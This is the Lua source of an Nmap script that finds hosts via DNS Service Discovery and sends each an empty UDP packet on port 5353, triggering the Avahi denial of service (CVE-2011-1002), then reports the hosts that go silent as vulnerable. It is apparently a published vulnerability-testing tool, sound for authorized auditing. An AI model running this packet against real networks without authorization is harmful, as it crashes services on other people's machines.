1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
|
local dnssd = require "dnssd"
local nmap = require "nmap"
local stdnse = require "stdnse"
local table = require "table"
description=[[
Attempts to discover hosts in the local network using the DNS Service
Discovery protocol and sends a NULL UDP packet to each host to test
if it is vulnerable to the Avahi NULL UDP packet denial of service
(CVE-2011-1002).
The <code>broadcast-avahi-dos.wait</code> script argument specifies how
many number of seconds to wait before a new attempt of host discovery.
Each host who does not respond to this second attempt will be considered
vulnerable.
Reference:
* http://avahi.org/ticket/325
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1002
]]
---
-- @usage
-- nmap --script=broadcast-avahi-dos
--
-- @output
-- | broadcast-avahi-dos:
-- | Discovered hosts:
-- | 10.0.1.150
-- | 10.0.1.151
-- | After NULL UDP avahi packet DoS (CVE-2011-1002).
-- | Hosts that seem down (vulnerable):
-- |_ 10.0.1.151
--
-- @args broadcast-avahi-dos.wait Wait time in seconds before executing
-- the check, the default value is 20 seconds.
author = "Djalal Harouni"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"broadcast", "dos", "intrusive", "vuln"}
prerule = function() return true end
avahi_send_null_udp = function(ip)
local socket = nmap.new_socket("udp")
local status = socket:sendto(ip, 5353, "")
socket:close()
return status
end
action = function()
local wtime = stdnse.get_script_args("broadcast-avahi-dos.wait") or 20
local helper = dnssd.Helper:new()
helper:setMulticast(true)
local status, result = helper:queryServices()
if (status) then
local output, hosts, tmp = {}, {}, {}
for _, hostcfg in pairs(result) do
for k, ip in pairs(hostcfg) do
if type(k) == "string" and k == "name" then
if avahi_send_null_udp(ip) then
table.insert(hosts, ip)
tmp[ip] = true
end
end
end
end
if next(hosts) then
hosts.name = "Discovered hosts:"
table.insert(output, hosts)
table.insert(output,
"After NULL UDP avahi packet DoS (CVE-2011-1002).")
stdnse.debug3("sleeping for %d seconds", wtime)
stdnse.sleep(wtime)
-- try to re-discover hosts
status, result = helper:queryServices()
if (status) then
for _, hostcfg in pairs(result) do
for k, ip in pairs(hostcfg) do
if type(k) == "string" and k == "name" and tmp[ip] then
tmp[ip] = nil
end
end
end
end
local vulns = {}
for ip, _ in pairs(tmp) do
table.insert(vulns, ip)
end
if next(vulns) then
vulns.name = "Hosts that seem down (vulnerable):"
table.insert(output, vulns)
else
table.insert(output, "Hosts are all up (not vulnerable).")
end
return stdnse.format_output(true, output)
end
end
end
|
